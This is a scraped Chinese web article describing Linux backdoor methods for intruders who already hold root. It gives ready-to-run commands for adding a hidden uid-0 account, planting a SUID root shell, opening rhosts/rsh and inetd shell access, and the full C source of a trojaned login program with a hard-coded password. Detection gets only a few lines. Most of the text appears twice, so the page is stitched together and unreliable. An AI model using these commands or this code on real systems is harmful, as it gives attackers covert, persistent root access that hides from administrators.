浅析Linux系统后门技术和实践方法
互联网 发布时间:2008-10-08 19:38:35 作者:佚名
我要评论
后门简介
入侵者完全控制系统后,为方便下次进入而采用的一种技术。
一般通过修改系统配置文件和安装第三方后门工具来实现。
具有隐蔽性,能绕开系统日志,不易被系管理员发现等特点。
常用后门技术
增加超级用户账号
破解/嗅探用户
后门简介
入侵者完全控制系统后,为方便下次进入而采用的一种技术。
一般通过修改系统配置文件和安装第三方后门工具来实现。
具有隐蔽性,能绕开系统日志,不易被系管理员发现等特点。 常用后门技术 增加超级用户账号
破解/嗅探用户密码
放置SUID Shell
rhosts
利用系统服务程序
TCP/UDP/ICMP Shell
Crontab定时任务
共享库文件
工具包rootkit
可装载内核模块(LKM) 增加超级用户 # echo "e4gle:x:0:0::/:/bin/sh" >>
/etc/passwd
# echo "e4gle::-1:-1:-1:-1:-1:-1:500" >>
/etc/shadow
如果系统不允许uid=0的用户远程登录,
还需要增加一个普通用户账号。 破解/嗅探用户密码 获得shadow文件后,用John the Ripper
工具破解薄弱的用户密码。
安装sniffit等嗅探工具,监听telnet、ftp等
端口,收集用户密码。 放置SUID Shell # cp /bin/bash /dev/.rootshell
# chmod u s /dev/.rootshell
普通用户在本机运行/dev/.rootshell,即
可获得一个root权限的shell。 rhosts # echo " " > /.rhosts
# rsh -l root victim.com csh -i
远程可以得到一个rootshell。 利用系统服务程序 修改/etc/inetd.conf,
daytime stream tcp nowait /bin/sh sh -I
用trojan程序替换in.telnetd、in.rexecd等
inted的服务程序
重定向login程序 TCP/UDP/ICMP Shell BindShell,大部分是基于TCP/UDP协议
的网络服务程序,在高端口监听,很容易
被发现。
Ping Backdoor,通过ICMP包激活后门,
形成一个Shell通道。
TCP ACK数据包后门,能够穿越防火
墙。 Crontab定时任务 通过Crontab程序调度已安装的后门程序
定时运行,一般在深夜时段,是系统管理
员不在线的时间。 共享库文件 在共享库中嵌入后门函数
使用后门口令激活Shell,获得权限
能够躲避系统管理员对二进制文件本身的
校验 工具包rootkit 包含一系列系统及后门工具:
- 清除日志中的登录记录
- 伪装校验和
- 替换netstat、ps等网络工具
- 后门登录程序
易于安装和使用 可装载内核模块(LKM) LKM:Loadable Kernel Modules
动态的加载,不需要重新编译内核。
截获系统调用,具有隐藏目录、文件、进
程、网络连接等强大功能。
自身隐蔽性好,发现难度较大。
著名的LKM包有adore和knark。 后门的检测 以自己的经验,结合特定的工具,手工作
一些检测。
使用Tripwire或md5校验来检查系统。
借助IDS系统,监听到目标机器的可疑网
络连接。 实例:login后门 入侵者先把原始的/bin/login备份,再用一
段程序替换/bin/login。入侵者telnet登录
进来的时候,通过环境变量或者终端类型
传递了正确的后门密码,将直接获得一个
Shell;如果是普通用户登录,将会重定
向到原始的login文件,来处理正常的登
录。
最简单的login后门ulogin.c源代码如下: 实例:login后门 #include <stdio.h>
#define PASSWORD "passWORD"
#define _PATH_LOGIN "/sbin/logins" main (argc, argv, envp)
int argc;
char **argv, **envp;
{
char *display = getenv("DISPLAY");
if ( display == NULL ) {
execve(_PATH_LOGIN, argv, envp);
perror(_PATH_LOGIN);
exit(1);
}
if (!strcmp(display,PASSWORD)) {
system("/bin/csh");
exit(1);
}
execve(_PATH_LOGIN, argv, envp);
exit(1);
}
一般通过修改系统配置文件和安装第三方后门工具来实现。
具有隐蔽性,能绕开系统日志,不易被系管理员发现等特点。 常用后门技术 增加超级用户账号
破解/嗅探用户密码
放置SUID Shell
rhosts
利用系统服务程序
TCP/UDP/ICMP Shell
Crontab定时任务
共享库文件
工具包rootkit
可装载内核模块(LKM) 增加超级用户 # echo "e4gle:x:0:0::/:/bin/sh" >>
/etc/passwd
# echo "e4gle::-1:-1:-1:-1:-1:-1:500" >>
/etc/shadow
如果系统不允许uid=0的用户远程登录,
还需要增加一个普通用户账号。 破解/嗅探用户密码 获得shadow文件后,用John the Ripper
工具破解薄弱的用户密码。
安装sniffit等嗅探工具,监听telnet、ftp等
端口,收集用户密码。 放置SUID Shell # cp /bin/bash /dev/.rootshell
# chmod u s /dev/.rootshell
普通用户在本机运行/dev/.rootshell,即
可获得一个root权限的shell。 rhosts # echo " " > /.rhosts
# rsh -l root victim.com csh -i
远程可以得到一个rootshell。 利用系统服务程序 修改/etc/inetd.conf,
daytime stream tcp nowait /bin/sh sh -I
用trojan程序替换in.telnetd、in.rexecd等
inted的服务程序
重定向login程序 TCP/UDP/ICMP Shell BindShell,大部分是基于TCP/UDP协议
的网络服务程序,在高端口监听,很容易
被发现。
Ping Backdoor,通过ICMP包激活后门,
形成一个Shell通道。
TCP ACK数据包后门,能够穿越防火
墙。 Crontab定时任务 通过Crontab程序调度已安装的后门程序
定时运行,一般在深夜时段,是系统管理
员不在线的时间。 共享库文件 在共享库中嵌入后门函数
使用后门口令激活Shell,获得权限
能够躲避系统管理员对二进制文件本身的
校验 工具包rootkit 包含一系列系统及后门工具:
- 清除日志中的登录记录
- 伪装校验和
- 替换netstat、ps等网络工具
- 后门登录程序
易于安装和使用 可装载内核模块(LKM) LKM:Loadable Kernel Modules
动态的加载,不需要重新编译内核。
截获系统调用,具有隐藏目录、文件、进
程、网络连接等强大功能。
自身隐蔽性好,发现难度较大。
著名的LKM包有adore和knark。 后门的检测 以自己的经验,结合特定的工具,手工作
一些检测。
使用Tripwire或md5校验来检查系统。
借助IDS系统,监听到目标机器的可疑网
络连接。 实例:login后门 入侵者先把原始的/bin/login备份,再用一
段程序替换/bin/login。入侵者telnet登录
进来的时候,通过环境变量或者终端类型
传递了正确的后门密码,将直接获得一个
Shell;如果是普通用户登录,将会重定
向到原始的login文件,来处理正常的登
录。
最简单的login后门ulogin.c源代码如下: 实例:login后门 #include <stdio.h>
#define PASSWORD "passWORD"
#define _PATH_LOGIN "/sbin/logins" main (argc, argv, envp)
int argc;
char **argv, **envp;
{
char *display = getenv("DISPLAY");
if ( display == NULL ) {
execve(_PATH_LOGIN, argv, envp);
perror(_PATH_LOGIN);
exit(1);
}
if (!strcmp(display,PASSWORD)) {
system("/bin/csh");
exit(1);
}
execve(_PATH_LOGIN, argv, envp);
exit(1);
}
相关文章
CC主要是用来攻击页面的,大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,对不?!一般来说,访问的人越多,论坛的页2024-01-06
入侵者主要通过Potato程序攻击拥有SYSTEM权限的端口伪造网络身份认证过程,利用NTLM重放机制骗取SYSTEM身份令牌,最终取得系统权限,该安全风险微软并不认为存在漏洞,所以2021-04-15
这篇文章主要介绍了文件上传漏洞全面渗透分析小结,这里主要为大家分享一下防御方法,需要的朋友可以参考下2021-03-21- 这篇文章主要介绍了sql手工注入语句&SQL手工注入大全,需要的朋友可以参考下2017-09-06
- 这篇文章主要介绍了详解Filezilla server 提权,需要的朋友可以参考下2017-05-13
FileZilla Server 2008 x64 提权与防御方法
这篇文章主要介绍了FileZilla Server 2008 x64 提权与防御方法,需要的朋友可以参考下2017-05-13- 不久之前我们说过关于http和https的区别,对于加密的https,我们一直认为它是相对安全的,可今天要讲的是,一种绕过HTTPS加密得到明文信息的web攻击方式,不知道这消息对你2016-08-10
iPhone和Mac也会被黑 一条iMessage密码可能就被盗了
一直以来苹果系统的安全性都是比安卓要高的,但是再安全的系统也免不了漏洞,苹果也一样。最近爆出的新漏洞,只需要接收一条多媒体信息或者iMessage就会导致用户信息泄露。2016-07-27- 国家正在修正关于黑客方面的法律法规,有一条震惊黑客圈的“世纪佳缘”起诉白帽黑客事件,深深的伤害了广大黑客们的心,加上扎克伯格和特拉维斯·卡兰尼克账号被盗,于是黑2016-07-11
如何逆向破解HawkEye keylogger键盘记录器进入攻击者邮箱
面对恶意邮件攻击,我们就只能默默忍受被他攻击,连自我保护能力都没有谈什么反抗?让人痛快的是,如今有了解决办法,逆向破解键盘记录器,进入攻击者邮箱2016-07-06



最新评论